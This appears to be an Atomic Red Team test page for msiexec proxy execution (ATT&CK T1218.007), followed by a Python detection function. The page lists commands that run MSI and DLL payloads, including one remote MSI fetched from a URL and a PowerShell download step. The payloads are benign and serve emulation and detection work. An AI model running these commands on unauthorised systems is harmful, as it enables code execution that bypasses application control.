
Signed Binary Proxy Execution: Msiexec

Description from ATT&CK

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

Atomic Tests

Atomic Test #1 - Msiexec.exe - Execute Local MSI file

Execute an arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when successfully executed.

Supported Platforms: windows

auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8

Inputs:

Name | Description | Type | Default Value
msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"

Dependencies: Run with powershell!

Description: T1218.msi must exist on disk at specified location (#{msi_payload})

Check Prereq Commands:

if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}

Get Prereq Commands:

Write-Host "You must provide your own MSI"

Atomic Test #2 - Msiexec.exe - Execute Remote MSI file

Execute an arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when successfully executed.

Supported Platforms: windows

auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649

Inputs:

Name | Description | Type | Default Value
msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"

Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL

Execute an arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32-bit systems, change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, the 64-bit version is downloaded.

Supported Platforms: windows

auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec

Inputs:

Name | Description | Type | Default Value
dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll

Attack Commands: Run with command_prompt!

msiexec.exe /y "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (Split-Path "#{dll_payload}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
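
Detection-side view of the three tests above, as an added example (not part of Atomic Red Team): a Python triage function that labels process-creation command lines by the msiexec switches they use. The label names, the `C:\AtomicRedTeam` folder, and the sample command lines are constructed for illustration. Beyond the `/q`, `/i` and `/y` switches used on this page, it also recognises the documented `/package`, `/qn`, `/quiet` and `/z` switches and treats UNC paths as remote sources.

```python
import shlex

INSTALL = {"i", "package"}      # install a package
QUIET = {"q", "qn", "quiet"}    # suppress the installer UI
DLL_CALL = {"y", "z"}           # DllRegisterServer / DllUnregisterServer
REMOTE = ("http://", "https://", "\\\\")  # URL or UNC share


def classify_msiexec(cmdline):
    """Return sorted labels for one command line; [] if it is not msiexec."""
    try:
        # posix=False keeps Windows backslashes literal and quoted paths whole.
        raw = shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quote: fall back to naive split
        raw = cmdline.split()
    tokens = [t.strip('"') for t in raw]
    if not tokens:
        return []
    image = tokens[0].lower().rsplit("\\", 1)[-1]
    if image not in ("msiexec", "msiexec.exe"):
        return []
    findings = set()
    args = tokens[1:]
    for i, tok in enumerate(args):
        if not tok.startswith(("/", "-")):   # msiexec accepts both prefixes
            continue
        switch = tok[1:].lower()
        operand = args[i + 1] if i + 1 < len(args) else ""
        if switch in QUIET:
            findings.add("quiet")
        elif switch in INSTALL:
            findings.add("install")
            if operand.lower().startswith(REMOTE):
                findings.add("remote_source")
        elif switch in DLL_CALL:
            findings.add("dll_call")
    return sorted(findings)


# Constructed samples mirroring Atomic Tests #1-#3 with default inputs filled in.
SAMPLES = [
    r'msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\Win32\T1218.msi"',
    'msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi"',
    r'msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\x64\T1218.dll"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify_msiexec(line), "<-", line)
```

A quiet local install alone matches ordinary software deployment, so `remote_source` and `dll_call` are the labels worth alerting on; the function does not handle a switch fused to its operand (for example `/i"path"`).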
